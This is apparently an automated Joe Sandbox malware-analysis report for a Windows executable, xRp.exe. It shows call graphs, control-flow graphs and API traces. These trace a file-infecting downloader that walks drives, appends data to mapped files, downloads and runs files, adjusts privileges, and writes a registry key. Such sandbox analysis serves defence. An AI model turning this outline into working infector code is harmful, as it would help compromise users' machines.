1106->1089 1107->1100 1108->1101 1110 e32c09 WaitForMultipleObjects 1109->1110 1111 e32bc8 1109->1111 1113 e32c2a CreateThread 1110->1113 1114 e32c3c 1110->1114 1112 e32bfa lstrlen 1111->1112 1115 e32bd2 GetDriveTypeA 1111->1115 1116 e32be3 CreateThread 1111->1116 1112->1110 1112->1111 1113->1114 1120 e32845 1113->1120 1115->1111 1115->1112 1116->1112 1117 e32b7d 1116->1117 1131 e329e2 memset wsprintfA 1117->1131 1268 e3274a memset memset SHGetSpecialFolderPathA wsprintfA 1120->1268 1122 e32878 DeleteFileA 1124 e3289a 1122->1124 1125 e3288c VirtualFree 1122->1125 1123 e32853 1123->1122 1126 e32692 8 API calls 1123->1126 1129 e32859 1123->1129 1127 e328a4 CloseHandle 1124->1127 1128 e328ab 1124->1128 1125->1124 1126->1123 1127->1128 1130 e3239d 186 API calls 1129->1130 1130->1123 1132 e32a3a memset lstrlen lstrcpyn strrchr 1131->1132 1133 e32abc memset memset FindFirstFileA 1131->1133 1132->1133 1134 e32a88 1132->1134 1145 e328b8 memset wsprintfA 1133->1145 1134->1133 1136 e32a9a lstrcmpiA 1134->1136 1138 e32b74 1136->1138 1139 e32aad lstrlen 1136->1139 1139->1133 1139->1136 1140 e32b61 FindNextFileA 1141 e32b6d FindClose 1140->1141 1142 e32b23 1140->1142 1141->1138 1143 e328b8 174 API calls 1142->1143 1144 e32b35 lstrcmpiA 1142->1144 1143->1140 1144->1141 1144->1142 1146 e32905 1145->1146 1155 e32951 memset 1145->1155 1147 e32956 strrchr 1146->1147 1148 e3291b memset wsprintfA 1146->1148 1146->1155 1150 e32967 lstrcmpiA 1147->1150 1147->1155 1149 e329e2 180 API calls 1148->1149 1149->1155 1151 e3297a 1150->1151 1152 e32988 lstrcmpiA 1150->1152 1163 e31e6e 1151->1163 1154 e32994 1152->1154 1152->1155 1156 e329ad strstr 1154->1156 1157 e329a5 lstrcpy 1154->1157 1155->1140 1158 e329d3 1156->1158 1159 e329cb 1156->1159 1157->1156 1228 e32692 1158->1228 1206 e3239d strstr 1159->1206 1164 e31e7d 1163->1164 1237 e31df6 strrchr 1164->1237 1167 e32332 1171 e32346 1167->1171 1172 e3233d UnmapViewOfFile 1167->1172 1168 e31eb0 SetFileAttributesA CreateFileA 1168->1167 1169 e31edf 1168->1169 1242 e31915 1169->1242 1173 e32350 1171->1173 1174 e3234b CloseHandle 1171->1174 1172->1171 1176 e32391 1173->1176 1177 e32356 CloseHandle 1173->1177 1174->1173 1176->1155 1177->1176 1178 e31f2e 1178->1167 1248 e31c81 1178->1248 1182 e31f92 1183 e31c81 2 API calls 1182->1183 1184 e31f9f 1183->1184 1184->1167 1185 e31af9 169 API calls 1184->1185 1186 e32024 1184->1186 1190 e31fc0 1185->1190 1186->1167 1187 e31af9 169 API calls 1186->1187 1188 e3207a 1187->1188 1189 e31af9 169 API calls 1188->1189 1194 e32090 1189->1194 1190->1167 1190->1186 1191 e31af9 169 API calls 1190->1191 1192 e31ffe 1191->1192 1193 e32013 FlushViewOfFile 1192->1193 1193->1186 1195 e320bb memset memset 1194->1195 1196 e320f5 1195->1196 1197 e31c81 2 API calls 1196->1197 1198 e321de 1197->1198 1199 e32226 memcpy UnmapViewOfFile CloseHandle 1198->1199 1253 e31b8a 1199->1253 1201 e3226e 1261 e3185b GetSystemTimeAsFileTime srand rand srand rand 1201->1261 1203 e322ab SetFilePointer SetEndOfFile SetFilePointer WriteFile WriteFile 1204 e31915 3 API calls 1203->1204 1205 e3231f CloseHandle 1204->1205 1205->1167 1207 e32451 CreateFileA GetFileSize 1206->1207 1211 e323d8 1206->1211 1208 e32480 1207->1208 1209 e32675 CloseHandle 1207->1209 1208->1209 1212 e32499 1208->1212 1210 e3267c RemoveDirectoryA 1209->1210 1213 e32687 1210->1213 1211->1207 1211->1213 1214 e31915 3 API calls 1212->1214 1213->1155 1215 e324a4 9 API calls 1214->1215 1263 e3189d memset CreateProcessA 1215->1263 1218 e3255c Sleep memset wsprintfA 1219 e329e2 163 API calls 1218->1219 1220 e32597 memset wsprintfA Sleep 1219->1220 1221 e3189d 6 API calls 1220->1221 1222 e325e4 Sleep CreateFileA 1221->1222 1223 e31915 3 API calls 1222->1223 1224 e32610 CloseHandle 1223->1224 1224->1210 1225 e3261e 1224->1225 1225->1210 1226 e32641 SetFilePointer WriteFile 1225->1226 1226->1210 1227 e32667 SetEndOfFile 1226->1227 1227->1210 1229 e326b2 WaitForSingleObject 1228->1229 1230 e326a2 CreateEventA 1228->1230 1231 e326c1 lstrlen ??2@YAPAXI 1229->1231 1232 e32708 1229->1232 1230->1229 1233 e32736 SetEvent 1231->1233 1234 e326da lstrcpy 1231->1234 1232->1233 1236 e32718 lstrcpy ??3@YAXPAX 1232->1236 1233->1155 1235 e326f1 1234->1235 1235->1233 1236->1235 1238 e31e13 lstrcpy strrchr 1237->1238 1240 e31e62 1237->1240 1239 e31e40 lstrcmpiA 1238->1239 1238->1240 1239->1240 1241 e31e52 lstrlen 1239->1241 1240->1167 1240->1168 1241->1239 1241->1240 1243 e31928 1242->1243 1244 e31924 SetFilePointer CreateFileMappingA MapViewOfFile 1242->1244 1245 e3194f 1243->1245 1246 e3192e memset GetFileTime 1243->1246 1244->1167 1244->1178 1245->1244 1247 e31954 SetFileTime 1245->1247 1246->1244 1247->1244 1249 e31c9c 1248->1249 1251 e31c94 1248->1251 1250 e31cae memset memset 1249->1250 1249->1251 1250->1251 1251->1167 1252 e3185b GetSystemTimeAsFileTime srand rand srand rand 1251->1252 1252->1182 1255 e31b93 1253->1255 1262 e3185b GetSystemTimeAsFileTime srand rand srand rand 1255->1262 1256 e31bca srand 1257 e31bd8 rand 1256->1257 1258 e31c08 1257->1258 1258->1257 1259 e31c29 memset memcpy lstrcat 1258->1259 1259->1201 1261->1203 1262->1256 1264 e318e0 CloseHandle WaitForSingleObject 1263->1264 1265 e3190c 1263->1265 1266 e31907 CloseHandle 1264->1266 1267 e318fb GetExitCodeProcess 1264->1267 1265->1210 1265->1218 1266->1265 1267->1266 1277 e3185b GetSystemTimeAsFileTime srand rand srand rand 1268->1277 1270 e327b5 wsprintfA CopyFileA 1271 e32840 1270->1271 1272 e327de wsprintfA 1270->1272 1271->1123 1273 e31973 17 API calls 1272->1273 1274 e3280f 1273->1274 1275 e32813 DeleteFileA 1274->1275 1276 e32820 CreateFileA 1274->1276 1275->1276 1276->1271 1277->1270 1278->1062 1280 e31200 CloseHandle 1279->1280 1281 e311c6 AdjustTokenPrivileges 1279->1281 1280->1069 1282 e311f7 CloseHandle 1281->1282 1283 e311f6 1281->1283 1282->1280 1283->1282 1285 e31310 1284->1285 1286 e3123f GetCurrentProcessId OpenProcess 1284->1286 1285->1067 1293 e31319 1285->1293 1286->1285 1290 e31262 1286->1290 1287 e312b0 VirtualAlloc 1287->1290 1292 e312b8 1287->1292 1288 e312f1 CloseHandle 1288->1285 1289 e31302 VirtualFree 1288->1289 1289->1285 1290->1287 1290->1288 1291 e31296 VirtualFree 1290->1291 1290->1292 1291->1287 1292->1288 1294 e3134a 1293->1294 1295 e3132a GetModuleHandleA GetProcAddress 1293->1295 1296 e31351 memset 1294->1296 1297 e31363 1294->1297 1295->1294 1295->1297 1296->1297 1297->1067 1297->1076 1299 e31196 1298->1299 1300 e310ba 1298->1300 1300->1299 1316 e3185b GetSystemTimeAsFileTime srand rand srand rand 1300->1316 1302 e31118 wsprintfA wsprintfA URLDownloadToFileA 1303 e31168 lstrlen Sleep 1302->1303 1304 e310dc 1302->1304 1303->1300 1307 e31000 CreateFileA 1304->1307 1308 e31092 WinExec lstrlen 1307->1308 1309 e31025 GetFileSize CreateFileMappingA MapViewOfFile 1307->1309 1308->1299 1308->1300 1310 e31057 1309->1310 1311 e3107b 1309->1311 1314 e31061 1310->1314 1315 e31074 UnmapViewOfFile 1310->1315 1312 e31087 CloseHandle 1311->1312 1313 e3108d CloseHandle 1311->1313 1312->1313 1313->1308 1314->1315 1315->1311 1316->1302 1344 e32361 1345 e32374 1344->1345 1346 e3236b UnmapViewOfFile 1344->1346 1347 e32382 1345->1347 1348 e32379 CloseHandle 1345->1348 1346->1345 1349 e32391 1347->1349 1350 e32388 CloseHandle 1347->1350 1348->1347 1350->1349 1318 e36076 1319 e360c7 1318->1319 1320 e3607b 1318->1320 1321 e3615f VirtualFree 1319->1321 1323 e36198 VirtualFree 1319->1323 1324 e360d5 VirtualAlloc 1319->1324 1320->1319 1322 e360b0 VirtualAlloc 1320->1322 1330 e361b2 1320->1330 1321->1319 1322->1319 1323->1330 1324->1319 1325 e36389 VirtualProtect 1328 e363b7 1325->1328 1326 e363fc VirtualProtect 1327 e36400 1326->1327 1328->1326 1329 e363e7 VirtualProtect 1328->1329 1329->1326 1329->1328 1330->1325 1331 e362fb 1330->1331 1351 e36014 1352 e3605f 1351->1352 1353 e36035 GetModuleHandleA 1351->1353 1354 e3604d GetProcAddress 1353->1354 1355 e36058 1354->1355 1355->1352 1355->1354 1355->1355 1332 e36159 1333 e3615f VirtualFree 1332->1333 1336 e360c7 1333->1336 1334 e36198 VirtualFree 1338 e361b2 1334->1338 1335 e360d5 VirtualAlloc 1335->1336 1336->1333 1336->1334 1336->1335 1337 e36389 VirtualProtect 1341 e363b7 1337->1341 1338->1337 1343 e362fb 1338->1343 1339 e363fc VirtualProtect 1340 e36400 1339->1340 1341->1339 1342 e363e7 VirtualProtect 1341->1342 1342->1339 1342->1341

                                      Callgraph

                                      • Executed
                                      • Not Executed
                                      • Opacity -> Relevance
                                      • Disassembly available
                                      callgraph 0 Function_00E36B63 24 Function_00E367A4 0->24 25 Function_00E369B0 0->25 26 Function_00E36834 0->26 1 Function_00E329E2 28 Function_00E328B8 1->28 2 Function_00E314E1 12 Function_00E31AF9 2->12 29 Function_00E31638 2->29 3 Function_00E32361 47 Function_00E32D9B 3->47 4 Function_00E32D60 5 Function_00E31C68 6 Function_00E31E6E 6->4 6->5 11 Function_00E31DF6 6->11 6->12 20 Function_00E3185B 6->20 33 Function_00E31C81 6->33 38 Function_00E31B8A 6->38 39 Function_00E31D8A 6->39 45 Function_00E31915 6->45 6->47 7 Function_00E31973 7->20 8 Function_00E36CF2 13 Function_00E36CF8 8->13 9 Function_00E32CF0 10 Function_00E36076 18 Function_00E366C8 10->18 12->29 14 Function_00E32B7D 14->1 15 Function_00E32845 16 Function_00E3274A 15->16 43 Function_00E32692 15->43 53 Function_00E3239D 15->53 16->7 16->20 17 Function_00E32C48 17->7 42 Function_00E32B8C 17->42 30 Function_00E36B02 18->30 35 Function_00E36D00 18->35 36 Function_00E36A84 18->36 19 Function_00E317D0 21 Function_00E36159 21->18 22 Function_00E3235D 23 Function_00E365A6 27 Function_00E36734 27->30 27->35 27->36 28->1 28->6 28->43 28->53 29->17 29->19 31 Function_00E31581 29->31 48 Function_00E31099 29->48 50 Function_00E31718 29->50 52 Function_00E3139F 29->52 30->0 31->20 32 Function_00E36001 37 Function_00E3600A 32->37 34 Function_00E31000 34->19 35->0 35->8 35->25 36->8 40 Function_00E3680F 36->40 38->20 41 Function_00E3120E 42->14 42->15 44 Function_00E36012 46 Function_00E36014 48->20 48->34 49 Function_00E31319 50->9 51 Function_00E3119F 52->41 52->49 52->51 53->1 53->45 54 Function_00E3189D 53->54

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 101 e329e2-e32a34 memset wsprintfA 102 e32a3a-e32a86 memset lstrlen lstrcpyn strrchr 101->102 103 e32abc-e32b21 memset * 2 FindFirstFileA call e328b8 memset 101->103 102->103 104 e32a88-e32a98 102->104 110 e32b61-e32b6b FindNextFileA 103->110 104->103 106 e32a9a-e32aa7 lstrcmpiA 104->106 108 e32b74-e32b7a 106->108 109 e32aad-e32aba lstrlen 106->109 109->103 109->106 111 e32b23-e32b2a 110->111 112 e32b6d-e32b6e FindClose 110->112 113 e32b4c-e32b5c call e328b8 111->113 114 e32b2c-e32b33 111->114 112->108 113->110 114->113 116 e32b35-e32b4a lstrcmpiA 114->116 116->112 116->113
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.2059047915.0000000000E31000.00000020.00000001.01000000.00000004.sdmp, Offset: 00E30000, based on PE: true
                                      • Associated: 0000000F.00000002.2059025954.0000000000E30000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 0000000F.00000002.2059072505.0000000000E33000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 0000000F.00000002.2059131530.0000000000E34000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 0000000F.00000002.2059168591.0000000000E36000.00000040.00000001.01000000.00000004.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_e30000_xRp.jbxd
                                      Similarity
                                      • API ID: memset$Find$Filelstrcmpilstrlen$CloseFirstNextlstrcpynstrrchrwsprintf
                                      • String ID: %s*$C:\$Documents and Settings
                                      • API String ID: 2826467728-110786608
                                      • Opcode ID: 573302995ddc139bad69c55a6f6a47572babad9b4dd0e7adf12ddfd12e1f81e9
                                      • Instruction ID: 2d9e75a2ca6eb327920b1a07ad694b6bc7c5abcc80b85759e6f38094e2a6e060
                                      • Opcode Fuzzy Hash: 573302995ddc139bad69c55a6f6a47572babad9b4dd0e7adf12ddfd12e1f81e9
                                      • Instruction Fuzzy Hash: 594132B2804349AFD720DBA1DC4DDEBBFECEB84315F041829B684E2151E6359648CBA1

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 231 e36076-e36079 232 e360e0-e360eb 231->232 233 e3607b-e36080 231->233 236 e360ee-e360f4 232->236 234 e36082-e36085 233->234 235 e360f7-e360f8 233->235 237 e360f6 234->237 240 e36087 234->240 238 e360fa-e360fc call e366c8 235->238 239 e360fe-e36106 235->239 236->237 237->235 238->239 242 e36155-e36189 VirtualFree 239->242 243 e36108-e3611d 239->243 240->236 244 e36089-e36095 240->244 249 e3618c-e36192 242->249 246 e3611f-e36121 243->246 247 e360a1-e360aa 244->247 248 e36097-e3609f 244->248 250 e36123 246->250 251 e36151-e36154 246->251 252 e360b0-e360c1 VirtualAlloc 247->252 253 e361ba-e361c8 247->253 248->247 254 e360c7-e360cf 249->254 255 e36198-e361b0 VirtualFree 249->255 250->251 258 e36125-e36128 250->258 251->242 252->254 256 e36243-e36251 253->256 257 e361ca-e361d7 253->257 254->249 265 e360d5-e360df VirtualAlloc 254->265 255->253 261 e361b2-e361b4 255->261 259 e36253 256->259 260 e36264-e3626f 256->260 262 e361dd-e361e0 257->262 263 e36134-e3613b 258->263 264 e3612a-e3612e 258->264 266 e36255-e36258 259->266 267 e36271-e36276 260->267 261->253 262->256 268 e361e2-e361f2 262->268 275 e36130-e36132 263->275 276 e3613d-e3614f 263->276 264->263 264->275 265->232 266->260 271 e3625a-e36262 266->271 272 e36389-e363b1 VirtualProtect 267->272 273 e3627c-e36289 267->273 274 e361f5-e361fe 268->274 271->266 279 e363b7-e363ba 272->279 289 e36292-e36298 273->289 290 e3628b 273->290 277 e36200-e36203 274->277 278 e3620c-e36219 274->278 275->246 276->246 281 e36205-e36208 277->281 282 e3621b-e36228 277->282 283 e36238-e3623f 278->283 284 e363fc-e363ff VirtualProtect 279->284 285 e363bc-e363c2 279->285 291 e3622a-e36236 281->291 292 e3620a 281->292 282->283 283->274 287 e36241 283->287 288 e36400-e36416 284->288 285->285 286 e363c4 285->286 286->284 293 e363c6-e363cf 286->293 287->262 294 e36420-e36425 288->294 295 e36418-e3641d 288->295 296 e362a2-e362ac 289->296 290->289 291->283 292->283 297 e363d1 293->297 298 e363d4-e363d8 293->298 299 e362b1-e362c8 296->299 300 e362ae 296->300 297->298 303 e363da 298->303 304 e363dd-e363e1 298->304 301 e36373-e36384 299->301 302 e362ce-e362d4 299->302 300->299 301->267 305 e362d6-e362d9 302->305 306 e362da-e362f1 302->306 303->304 307 e363e3 304->307 308 e363e7-e363fa VirtualProtect 304->308 305->306 310 e362f3-e362f9 306->310 311 e36365-e3636e 306->311 307->308 308->279 308->284 312 e36314-e36326 310->312 313 e362fb-e3630f 310->313 311->296 315 e36328-e3634a 312->315 316 e3634c-e36360 312->316 314 e36426-e364c0 313->314 326 e364c2 314->326 327 e36535-e36537 314->327 315->311 316->314 330 e364c5-e364cd 326->330 331 e364f8 326->331 328 e3659a 327->328 329 e36539 327->329 336 e3659b-e3659d 328->336 334 e365b4 329->334 335 e3653b-e36541 329->335 337 e36542-e36545 330->337 338 e364cf-e364d4 330->338 332 e364fa-e364fe 331->332 333 e3656c-e3656f 331->333 340 e36572 332->340 341 e36500 332->341 333->340 339 e365be-e365db 334->339 335->337 342 e36591-e36593 336->342 343 e3659f 336->343 344 e3654d-e36550 337->344 345 e36517-e3651c 338->345 346 e364d6-e364d9 338->346 348 e365dd-e365f6 339->348 349 e36573-e36576 340->349 350 e36522-e36533 341->350 351 e36502 341->351 342->336 354 e36595 342->354 355 e36588-e3658b 343->355 344->339 356 e36552-e36556 344->356 352 e36583-e36587 345->352 353 e3651d-e3651e 345->353 346->344 347 e364db-e364f5 346->347 347->331 359 e365f7-e36608 348->359 357 e36578-e3657a 349->357 350->327 351->349 360 e36504-e36513 351->360 352->355 353->350 354->328 361 e365a1-e365a3 355->361 362 e3658d-e3658f 355->362 356->357 358 e36558-e36569 356->358 357->348 363 e3657c 357->363 358->333 360->327 364 e36515 360->364 362->342 363->359 365 e3657e-e3657f 363->365 364->345 365->352
                                      APIs
                                      • VirtualAlloc.KERNELBASE(00000000,00001800,00001000,00000004), ref: 00E360BE
                                      • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004,?,?,?), ref: 00E360DF
                                      • VirtualFree.KERNELBASE(?,00000000,00008000,?,?,?), ref: 00E36189
                                      • VirtualFree.KERNELBASE(?,00000000,00008000), ref: 00E361A5
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.2059168591.0000000000E36000.00000040.00000001.01000000.00000004.sdmp, Offset: 00E30000, based on PE: true
                                      • Associated: 0000000F.00000002.2059025954.0000000000E30000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 0000000F.00000002.2059047915.0000000000E31000.00000020.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 0000000F.00000002.2059072505.0000000000E33000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 0000000F.00000002.2059131530.0000000000E34000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_e30000_xRp.jbxd
                                      Similarity
                                      • API ID: Virtual$AllocFree
                                      • String ID: kernel32.dll
                                      • API String ID: 2087232378-1793498882
                                      • Opcode ID: 4618d0a2ddede282a958458a193efd6e13d01b37ab7098c2d0a74775aedc443a
                                      • Instruction ID: 29834befba861b7f732a4209acc37055579e12f73a99d021fd3eb51066443aab
                                      • Opcode Fuzzy Hash: 4618d0a2ddede282a958458a193efd6e13d01b37ab7098c2d0a74775aedc443a
                                      • Instruction Fuzzy Hash: 7E124672508784AFDB328F34CC49BEA7FB0EF02314F1995ADD889AB1A3D674A901C755

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 366 e31718-e31733 GetSystemTimeAsFileTime 367 e31735-e31752 SHSetValueA 366->367 368 e31754-e31758 366->368 369 e317c6-e317cd 367->369 368->369 370 e3175a-e31784 SHGetValueA 368->370 370->369 371 e31786-e317b3 call e32cf0 * 2 370->371 371->369 376 e317b5 371->376 377 e317b7-e317bd 376->377 378 e317bf 376->378 377->369 377->378 378->369
                                      APIs
                                      • GetSystemTimeAsFileTime.KERNEL32(?,?,00000104,C:\Users\user\AppData\Local\Temp\xRp.exe), ref: 00E31729
                                      • SHSetValueA.SHLWAPI(80000002,SOFTWARE\GTplus,Time,00000003,?,00000008), ref: 00E3174C
                                      • SHGetValueA.SHLWAPI(80000002,SOFTWARE\GTplus,Time,?,?,00000001), ref: 00E3177C
                                      • __aulldiv.LIBCMT ref: 00E31796
                                      • __aulldiv.LIBCMT ref: 00E317A8
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.2059047915.0000000000E31000.00000020.00000001.01000000.00000004.sdmp, Offset: 00E30000, based on PE: true
                                      • Associated: 0000000F.00000002.2059025954.0000000000E30000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 0000000F.00000002.2059072505.0000000000E33000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 0000000F.00000002.2059131530.0000000000E34000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 0000000F.00000002.2059168591.0000000000E36000.00000040.00000001.01000000.00000004.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_e30000_xRp.jbxd
                                      Similarity
                                      • API ID: TimeValue__aulldiv$FileSystem
                                      • String ID: C:\Users\user\AppData\Local\Temp\xRp.exe$SOFTWARE\GTplus$Time
                                      • API String ID: 541852442-3211683193
                                      • Opcode ID: d8a323c89bb5efbe20754620ecfb8b0fa84858bd38b1db1e2138c035d968b592
                                      • Instruction ID: 6038e788e84d22ed4a7f4b06e6b18d75a8ebcd53d4f137234605b55ffe9ea2ac
                                      • Opcode Fuzzy Hash: d8a323c89bb5efbe20754620ecfb8b0fa84858bd38b1db1e2138c035d968b592
                                      • Instruction Fuzzy Hash: 37114675A00209BBDB209BA4CC8DFEFBFBCEB45B14F109159FA01B6141D6759A44CB60

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 0 e31e6e-e31e95 call e32d60 3 e31e97 call e31d8a 0->3 4 e31e9c-e31eaa call e31df6 0->4 3->4 8 e32332 4->8 9 e31eb0-e31ed9 SetFileAttributesA CreateFileA 4->9 11 e32338-e3233b 8->11 9->8 10 e31edf-e31f28 call e31915 SetFilePointer CreateFileMappingA MapViewOfFile 9->10 10->8 20 e31f2e-e31f39 10->20 13 e32346-e32349 11->13 14 e3233d-e32340 UnmapViewOfFile 11->14 15 e32350-e32354 13->15 16 e3234b-e3234e CloseHandle 13->16 14->13 18 e32391-e3239a call e32d9b 15->18 19 e32356-e3235b CloseHandle 15->19 16->15 19->18 20->8 22 e31f3f-e31f56 20->22 22->8 24 e31f5c-e31f64 22->24 24->8 25 e31f6a-e31f70 24->25 25->8 26 e31f76-e31f87 call e31c81 25->26 26->8 29 e31f8d-e31fa7 call e3185b call e31c81 26->29 29->8 34 e31fad-e31fb4 29->34 35 e31fb6-e31fc5 call e31af9 34->35 36 e32024-e32045 34->36 35->36 44 e31fc7-e31fd2 35->44 36->8 37 e3204b-e3204e 36->37 39 e32070-e320f4 call e31af9 * 2 call e31c68 * 2 memset * 2 37->39 40 e32050-e32053 37->40 62 e320f5-e320fe 39->62 42 e32056-e3205a 40->42 42->39 45 e3205c-e32061 42->45 44->8 47 e31fd8-e31fe7 44->47 45->8 48 e32067-e3206e 45->48 50 e31fe9-e31fec 47->50 51 e31fef-e32006 call e31af9 47->51 48->42 50->51 57 e32013-e3201e FlushViewOfFile 51->57 58 e32008-e3200e call e31c68 51->58 57->36 58->57 63 e32130-e32139 62->63 64 e32100-e32114 62->64 67 e3213c-e32142 63->67 65 e32116-e3212a 64->65 66 e3212d-e3212e 64->66 65->66 66->62 68 e32144-e32150 67->68 69 e3215c 67->69 70 e32152-e32154 68->70 71 e32157-e3215a 68->71 72 e3215f-e32162 69->72 70->71 71->67 73 e32181-e32184 72->73 74 e32164-e32171 72->74 77 e32186 73->77 78 e3218d-e321ba call e31c68 73->78 75 e32177-e3217e 74->75 76 e3232a-e3232d 74->76 75->73 76->72 77->78 81 e321d3-e3220b call e31c81 call e31c68 78->81 82 e321bc-e321d0 call e31c68 78->82 89 e3221b-e3221e 81->89 90 e3220d-e32218 call e31c68 81->90 82->81 92 e32220-e32223 89->92 93 e32226-e32328 memcpy UnmapViewOfFile CloseHandle call e31b8a call e3185b SetFilePointer SetEndOfFile SetFilePointer WriteFile * 2 call e31915 CloseHandle 89->93 90->89 92->93 93->11
                                      APIs
                                      • SetFileAttributesA.KERNELBASE(00E32597,00000080,00E32597,00E332B0,00000164,00E32986,?), ref: 00E31EB9
                                      • CreateFileA.KERNELBASE(00E32597,C0000000,00000000,00000000,00000003,00000080,00000000), ref: 00E31ECD
                                      • SetFilePointer.KERNEL32(000000FF,00000000,00000000,00000002,00000000,00000000), ref: 00E31EF3
                                      • CreateFileMappingA.KERNEL32(000000FF,00000000,00000004,00000000,00000000,00000000), ref: 00E31F07
                                      • MapViewOfFile.KERNEL32(00000000,000F001F,00000000,00000000,00000400), ref: 00E31F1D
                                      • FlushViewOfFile.KERNEL32(?,00000400,?,00000000,00000000,?,00000000,00000002), ref: 00E3201E
                                      • memset.MSVCRT ref: 00E320D8
                                      • memset.MSVCRT ref: 00E320EA
                                      • memcpy.MSVCRT ref: 00E3222D
                                      • UnmapViewOfFile.KERNEL32(?,?,00000002,?,?,?,?,00000000,00000000,?,00000000,00000002), ref: 00E32238
                                      • CloseHandle.KERNEL32(?,?,?,?,00000000,00000000,?,00000000,00000002), ref: 00E3224A
                                      • SetFilePointer.KERNEL32(000000FF,?,00000000,00000002,?,?,?,?,00000000,00000000,?,00000000,00000002), ref: 00E322C6
                                      • SetEndOfFile.KERNEL32(000000FF,?,?,?,00000000,00000000,?,00000000,00000002), ref: 00E322CB
                                      • SetFilePointer.KERNEL32(000000FF,?,00000000,00000002,?,?,?,00000000,00000000,?,00000000,00000002), ref: 00E322DD
                                      • WriteFile.KERNEL32(000000FF,00E34008,00000271,?,00000000,?,?,?,00000000,00000000,?,00000000,00000002), ref: 00E322F7
                                      • WriteFile.KERNEL32(000000FF,?,00000000,?,?,?,00000000,00000000,?,00000000,00000002), ref: 00E3230D
                                      • CloseHandle.KERNEL32(000000FF,000000FF,00000001,?,?,?,00000000,00000000,?,00000000,00000002), ref: 00E32322
                                      • UnmapViewOfFile.KERNEL32(?,00E32597,00E332B0,00000164,00E32986,?), ref: 00E32340
                                      • CloseHandle.KERNEL32(?,00E32597,00E332B0,00000164,00E32986,?), ref: 00E3234E
                                      • CloseHandle.KERNEL32(000000FF,00E32597,00E332B0,00000164,00E32986,?), ref: 00E32359
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.2059047915.0000000000E31000.00000020.00000001.01000000.00000004.sdmp, Offset: 00E30000, based on PE: true
                                      • Associated: 0000000F.00000002.2059025954.0000000000E30000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 0000000F.00000002.2059072505.0000000000E33000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 0000000F.00000002.2059131530.0000000000E34000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 0000000F.00000002.2059168591.0000000000E36000.00000040.00000001.01000000.00000004.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_e30000_xRp.jbxd
                                      Similarity
                                      • API ID: File$CloseHandleView$Pointer$CreateUnmapWritememset$AttributesFlushMappingmemcpy
                                      • String ID: .@$5@$<@$C@$m@
                                      • API String ID: 3043204753-519767493
                                      • Opcode ID: 180074bd1eca1feddc1052b657232437506130df20c51e6546f9c259b6072d01
                                      • Instruction ID: 029b33bb3f3f1ba230a4fd1ba468a8fbb4a78edb55da6dbf249f353039aa5471
                                      • Opcode Fuzzy Hash: 180074bd1eca1feddc1052b657232437506130df20c51e6546f9c259b6072d01
                                      • Instruction Fuzzy Hash: 7BF14671900209EFCB24DFA4D888AADBBB5FF08314F10956DE649B76A1D734AD85CF50

                                      Control-flow Graph

                                      APIs
                                      • memset.MSVCRT ref: 00E32766
                                      • memset.MSVCRT ref: 00E32774
                                      • SHGetSpecialFolderPathA.SHELL32(00000000,?,00000026,00000000), ref: 00E32787
                                      • wsprintfA.USER32 ref: 00E327AB
                                        • Part of subcall function 00E3185B: GetSystemTimeAsFileTime.KERNEL32(?,?,75BF8400,00000000,?,?,?,00E327B5), ref: 00E31867
                                        • Part of subcall function 00E3185B: srand.MSVCRT ref: 00E31878
                                        • Part of subcall function 00E3185B: rand.MSVCRT ref: 00E31880
                                        • Part of subcall function 00E3185B: srand.MSVCRT ref: 00E31890
                                        • Part of subcall function 00E3185B: rand.MSVCRT ref: 00E31894
                                      • wsprintfA.USER32 ref: 00E327C6
                                      • CopyFileA.KERNEL32(?,C:\Users\user\AppData\Local\Temp\6b1c0b84.exe,00000000), ref: 00E327D4
                                      • wsprintfA.USER32 ref: 00E327F4
                                        • Part of subcall function 00E31973: PathFileExistsA.KERNELBASE(TN,75BF8400,00000000), ref: 00E31992
                                        • Part of subcall function 00E31973: CreateFileA.KERNELBASE(?,80000000,00000001,00000000,00000003,00000000,00000000,C:\Users\user\AppData\Local\Temp\6b1c0b84.exe), ref: 00E319BA
                                        • Part of subcall function 00E31973: Sleep.KERNEL32(00000064), ref: 00E319C6
                                        • Part of subcall function 00E31973: wsprintfA.USER32 ref: 00E319EC
                                        • Part of subcall function 00E31973: CopyFileA.KERNEL32(?,?,00000000), ref: 00E31A00
                                        • Part of subcall function 00E31973: CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00E31A1E
                                        • Part of subcall function 00E31973: GetFileSize.KERNEL32(?,00000000), ref: 00E31A2C
                                        • Part of subcall function 00E31973: VirtualAlloc.KERNELBASE(00000000,00000000,00003000,00000004), ref: 00E31A46
                                        • Part of subcall function 00E31973: ReadFile.KERNELBASE(?,?,00000000,?,00000000), ref: 00E31A65
                                      • DeleteFileA.KERNEL32(?,?,00E34E54,00E34E58), ref: 00E3281A
